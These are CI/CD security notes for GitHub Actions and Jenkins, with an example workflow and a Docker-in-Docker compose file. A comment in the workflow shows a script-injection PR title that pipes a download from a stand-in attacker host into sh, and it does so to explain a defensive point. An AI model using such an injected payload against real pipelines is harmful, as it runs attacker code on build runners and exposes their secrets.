- Utilize caching so that unchanged dependencies or indices are not rebuilt on every run:
  - for general use, the `actions/cache` action;
  - for Docker builds, the `--cache-from` parameter of `docker build`.
- Limit the permissions of the `GITHUB_TOKEN` used by a workflow with the `permissions` key. The default permissions granted to all workflows can also be restricted in the repository settings (Settings -> Actions -> General).
- If a workflow runs on `pull_request`, make sure it does not run automatically for pull requests from third-party forks: under Settings -> Actions, require approval for workflow runs from outside collaborators. Be especially careful with `pull_request_target`, which runs in the base repository's context with a write-capable token and access to secrets; never check out and execute code from the fork in such a workflow.
- Make sure that the GitHub Actions you use are trustworthy. Restrict the allowed actions to trusted ones in the Actions settings, and pin third-party actions to a full commit SHA rather than a mutable tag.
- Pass user-controlled input (issue and PR titles, bodies, branch names, commit messages, ...) to scripts only via "proxy variables" (environment variables set from the expression) or as `with:` inputs to actions. Never interpolate `${{ ... }}` directly into a `run:` script, as the expression is expanded into the script text before the shell executes it, which allows script injection.
- Utilize GitHub Secrets for sensitive data such as credentials.
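The following workflow is an added example that ties the points above together; it is not a file from the original page. It assumes a Node project, a GitHub-hosted repository whose images are pushed to `ghcr.io/example-org/app` (a made-up name), and uses the built-in `GITHUB_TOKEN` for the registry login so that the `permissions` key is what actually grants the push.

```yaml
name: ci

on:
  push:
    branches: [main]
  pull_request:   # fork PRs run only after approval if the repository setting requires it

# Least privilege for GITHUB_TOKEN: every job starts read-only unless it
# asks for more in its own permissions block.
permissions:
  contents: read

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # In production pin to a full commit SHA; a tag such as v4 is mutable
      # and can be moved to point at different code.
      - uses: actions/checkout@v4

      # Cache the npm download cache, keyed on the lockfile so the cache is
      # invalidated whenever dependencies change.
      - uses: actions/cache@v4
        with:
          path: ~/.npm
          key: npm-${{ runner.os }}-${{ hashFiles('**/package-lock.json') }}
          restore-keys: npm-${{ runner.os }}-

      - run: npm ci && npm test

      # UNSAFE (kept only as a comment): the expression is expanded into the
      # script text before bash runs it, so a PR title such as
      #   x"; curl http://attacker.example/x | sh; echo "
      # executes on the runner.
      # - run: echo "PR title: ${{ github.event.pull_request.title }}"

      # SAFE: the value reaches the script as an environment variable
      # ("proxy variable") and is only ever data to the shell.
      - name: Show PR title
        if: github.event_name == 'pull_request'
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: printf 'PR title: %s\n' "$PR_TITLE"

  image:
    needs: build
    if: github.event_name == 'push'
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write   # only this job's token may push to the package registry
    steps:
      - uses: actions/checkout@v4

      # Credentials come from secrets (here the workflow token) and are fed
      # via stdin, so they appear neither on the command line nor in the log.
      - name: Log in to GHCR
        env:
          REGISTRY_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: echo "$REGISTRY_TOKEN" | docker login ghcr.io -u "$GITHUB_ACTOR" --password-stdin

      # Reuse layers from the last published image instead of rebuilding
      # unchanged stages. BUILDKIT_INLINE_CACHE embeds cache metadata in the
      # pushed image so a later --cache-from can use it.
      - name: Build with layer cache
        env:
          IMAGE: ghcr.io/example-org/app   # assumed image name
          SHA: ${{ github.sha }}
        run: |
          docker pull "$IMAGE:cache" || true
          docker build \
            --build-arg BUILDKIT_INLINE_CACHE=1 \
            --cache-from "$IMAGE:cache" \
            -t "$IMAGE:$SHA" -t "$IMAGE:cache" .
          docker push "$IMAGE:$SHA"
          docker push "$IMAGE:cache"
```

The `build` job can be triggered by an untrusted pull request, which is why it keeps the default read-only token and touches no secrets; only the `image` job, which runs solely on pushes to `main`, is granted `packages: write`.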
- Since we run Jenkins inside Docker and run the agents as Docker containers as well, builds need Docker-in-Docker (dind). One option is to mount the host's Docker socket (`/var/run/docker.sock`) into the Jenkins container; be aware that whoever controls that socket controls the host, so a compromised build then has root-equivalent access to the machine. Another approach is to run dind in a separate container next to Jenkins (for example with docker-compose) and have Jenkins talk to it over TLS.
- Some tasks in Jenkins can be executed in parallel; take advantage of it when you have independent steps. Yet be very careful not to create race conditions or uncontrolled concurrent requests to resources that require exclusive access. The Throttle Concurrent Builds plugin helps control how many builds run at once, and the Lockable Resources plugin's `lock` step serializes access to a shared resource inside a pipeline.
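An added example of the separate-dind-container approach described above (it is not the compose file the original page refers to, and the image tags, ports and volume names are assumptions). The Docker daemon runs in its own container and Jenkins reaches it over TCP with TLS client certificates shared through a volume, so the host's Docker socket is never exposed to Jenkins.

```yaml
# docker-compose.yml (example, not from the original page)
services:
  # Docker daemon in its own container. dind requires privileged mode, which
  # is itself host-root-equivalent, so run this on a dedicated CI host.
  docker:
    image: docker:dind
    privileged: true
    environment:
      DOCKER_TLS_CERTDIR: /certs   # dind generates server and client certs here on start
    volumes:
      - jenkins-docker-certs:/certs/client
      # Same path as on the Jenkins side, so bind mounts that Jenkins asks the
      # daemon for (e.g. the workspace into an agent container) resolve.
      - jenkins-data:/var/jenkins_home
    networks:
      - jenkins

  # The stock controller image has no docker CLI; build a derived image that
  # installs docker-ce-cli, or run the builds on agents that ship it.
  jenkins:
    image: jenkins/jenkins:lts-jdk17
    depends_on: [docker]
    environment:
      DOCKER_HOST: tcp://docker:2376   # TLS port of the dind service
      DOCKER_CERT_PATH: /certs/client
      DOCKER_TLS_VERIFY: "1"
    volumes:
      - jenkins-data:/var/jenkins_home
      - jenkins-docker-certs:/certs/client:ro   # client cert only, read-only
    ports:
      - "127.0.0.1:8080:8080"   # UI bound to localhost; terminate TLS in a reverse proxy
      - "50000:50000"           # inbound (JNLP) agents
    networks:
      - jenkins

volumes:
  jenkins-data:
  jenkins-docker-certs:

networks:
  jenkins:
```

Compared with mounting `/var/run/docker.sock`, a compromised build here gets a Docker daemon that is itself confined to the dind container's view of the world, and the daemon's port 2376 is only reachable on the compose network and only with the client certificate.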


